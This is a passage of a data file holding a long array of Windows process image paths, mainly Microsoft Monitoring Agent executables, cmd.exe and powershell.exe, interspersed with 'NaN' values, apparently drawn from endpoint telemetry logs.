Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"